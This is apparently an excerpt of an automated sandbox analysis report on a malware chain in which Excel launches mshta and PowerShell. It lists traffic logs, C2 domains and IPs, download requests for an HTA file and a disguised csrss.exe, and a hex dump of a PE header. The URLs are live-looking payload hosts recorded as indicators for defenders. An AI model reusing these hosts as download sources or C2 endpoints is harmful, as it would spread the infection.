            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167

            Networking

            barindex
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: unifrieghtmovers.com
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 23.95.60.82:2558
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 07:30:07 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28Last-Modified: Fri, 26 Jul 2024 06:04:08 GMTETag: "28ca00-61e204785c600"Accept-Ranges: bytesContent-Length: 2673152Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/lnkData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 60 0f d7 18 24 6e b9 4b 24 6e b9 4b 24 6e b9 4b e7 ed ba 4a 2d 6e b9 4b e7 ed bd 4a 28 6e b9 4b e7 ed bc 4a 0a 6e b9 4b 2d 16 2a 4b 2a 6e b9 4b 6f 16 b8 4a 2d 6e b9 4b 24 6e b8 4b dc 6e b9 4b e5 12 ba 4a 2f 6e b9 4b e5 12 bc 4a 60 6e b9 4b 24 6e b9 4b 25 6e b9 4b 37 ea b9 4a 25 6e b9 4b 37 ea 46 4b 25 6e b9 4b 37 ea bb 4a 25 6e b9 4b 52 69 63 68 24 6e b9 4b 00 00 00 00 00 00 00 00 50 45 00 00 64 86 08 00 6d d0 a2 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 84 13 00 00 42 15 00 00 f8 05 00 c0 8e 06 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2f 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 f0 dd 25 00 58 00 00 00 48 de 25 00 dc 00 00 00 00 30 28 00 a0 93 07 00 00 f0 26 00 d8 38 01 00 00 00 00 00 00 00 00 00 00 d0 2f 00 3c 06 00 00 50 fd 22 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 ff 22 00 28 00 00 00 10 fc 22 00 40 01 00 00 00 00 00 00 00 00 00 00 00 b0 19 00 30 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 10 07 00 00 10 00 00 00 12 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 6d 61 6e 61 67 65 64 b8 71 0c 00 00 30 07 00 00 72 0c 00 00 16 07 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 68 79 64 72 61 74 65 64 60 f7 05 00 00 b0 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 64 61 74 61 00 00 26 48 0c 00 00 b0 19 00 00 4a 0c 00 00 88 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 10 e9 00 00 00 00 26 00 00 22 00 00 00 d2 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 d8 38 01 00 00 f0 26 00 00 3a 01 00 00 f4 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 a0 93 07 00 00 30 28 00 00 94 07 00 00 2e 21 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 06 00 00 00 d0 2f 00 00 08 00 00 00 c2 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: global trafficHTTP traffic detected: GET /jjJsPX HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: tny.wtfConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xampp/ebcd/eb/gdfvr.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.92.245.100Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /jjJsPX HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: tny.wtfConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xampp/ebcd/eb/gdfvr.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8895-Connection: Keep-AliveHost: 91.92.245.100If-Range: "25ddd-61e14da080a28"
            Source: global trafficHTTP traffic detected: GET /T2507F/csrss.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.173.143.46Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /jjJsPX HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: tny.wtfConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /jjJsPX HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: tny.wtfConnection: Keep-Alive
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: unknownTCP traffic detected without corresponding DNS query: 91.92.245.100
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899F7018 URLDownloadToFileW,7_2_000007FE899F7018
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\379F14B3.emfJump to behavior
            Source: global trafficHTTP traffic detected: GET /jjJsPX HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: tny.wtfConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xampp/ebcd/eb/gdfvr.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.92.245.100Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /jjJsPX HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: tny.wtfConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xampp/ebcd/eb/gdfvr.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8895-Connection: Keep-AliveHost: 91.92.245.100If-Range: "25ddd-61e14da080a28"
            Source: global trafficHTTP traffic detected: GET /T2507F/csrss.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.173.143.46Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /jjJsPX HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: tny.wtfConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /jjJsPX HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: tny.wtfConnection: Keep-Alive
            Source: powershell.exe, 00000007.00000002.455975386.000000001C440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: tny.wtf
            Source: global trafficDNS traffic detected: DNS query: unifrieghtmovers.com
            Source: global trafficDNS traffic detected: DNS query: geoplugin.net
            Source: powershell.exe, 00000007.00000002.449435147.0000000002623000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.483902193.00000000026CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.173.143.46/T2507F/csr
            Source: powershell.exe, 00000013.00000002.483902193.00000000026CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.173.143.46/T2507F/csrss.exe
            Source: powershell.exe, 00000007.00000002.455975386.000000001C3C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.173.143.46/T2507F/csrss.exed.
            Source: powershell.exe, 00000013.00000002.489480770.000000001C2B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.173.143.46/T2507F/csrss.exem1
            Source: powershell.exe, 00000007.00000002.449435147.0000000002623000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.483902193.00000000026CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.173.143.46/T2507F/csrss.exep
            Source: powershell.exe, 00000013.00000002.489480770.000000001C2B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.173.143.46/T2507F/csrss.exewerSh
            Source: mshta.exe, 00000004.00000002.426650373.0000000000197000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421936825.000000000019C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.475855460.0000000003A80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.92.245.100/
            Source: mshta.exe, 00000004.00000002.426650373.0000000000197000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421936825.000000000019C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.92.245.100/up
            Source: mshta.exe, 00000010.00000003.469460377.00000000002B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.92.245.100/xampp/ebcd/eb/gdfvr.hta
            Source: mshta.exe, 00000010.00000003.469460377.00000000002B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.92.245.100/xampp/ebcd/eb/gdfvr.hta...b
            Source: mshta.exe, 00000004.00000003.421936825.0000000000173000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.92.245.100/xampp/ebcd/eb/gdfvr.hta...r
            Source: mshta.exe, 00000004.00000002.426650373.0000000000197000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421936825.000000000019C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.475597397.00000000002B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475195108.00000000002B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475273547.00000000002B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.469460377.00000000002B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.92.245.100/xampp/ebcd/eb/gdfvr.htaC:
            Source: mshta.exe, 00000010.00000002.475855460.0000000003A80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.92.245.100/xampp/ebcd/eb/gdfvr.htaP
            Source: mshta.exe, 00000010.00000003.473435491.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.474035843.0000000002A65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.92.245.100/xampp/ebcd/eb/gdfvr.htahttp://91.92.245.100/xampp/ebcd/eb/gdfvr.hta
            Source: mshta.exe, 00000004.00000003.424041898.00000000029E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.92.245.100/xampp/ebcd/eb/gdfvr.htahttp://91.92.245.100/xampp/ebcd/eb/gdfvr.hta0
            Source: mshta.exe, 00000010.00000002.475597397.00000000002B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475195108.00000000002B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475273547.00000000002B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.469460377.00000000002B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.92.245.100/xampp/ebcd/eb/gdfvr.htaic
            Source: mshta.exe, 00000004.00000002.429059359.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.92.245.100/xampp/ebcd/eb/gdfvr.htao
            Source: mshta.exe, 00000004.00000002.426650373.0000000000197000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421936825.000000000019C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.92.245.100/xampp/ebcd/eb/gdfvr.htaoso
            Source: mshta.exe, 00000004.00000002.426650373.0000000000173000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421936825.0000000000173000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.92.245.100/xampp/ebcd/eb/gdfvr.htat
            Source: mshta.exe, 00000004.00000003.424339169.00000000029ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.92.245.100/xampp/ebcd/eb/gdfvr.htax
            Source: powershell.exe, 00000007.00000002.455975386.000000001C455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: powershell.exe, 00000007.00000002.455975386.000000001C428000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C44B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C440000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C3C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: powershell.exe, 00000007.00000002.455975386.000000001C440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: powershell.exe, 00000007.00000002.455975386.000000001C428000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C44B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.455975386.000000001C455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: powershell.exe, 00000007.00000002.453915026.000000001A871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: powershell.exe, 00000007.00000002.455975386.000000001C440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
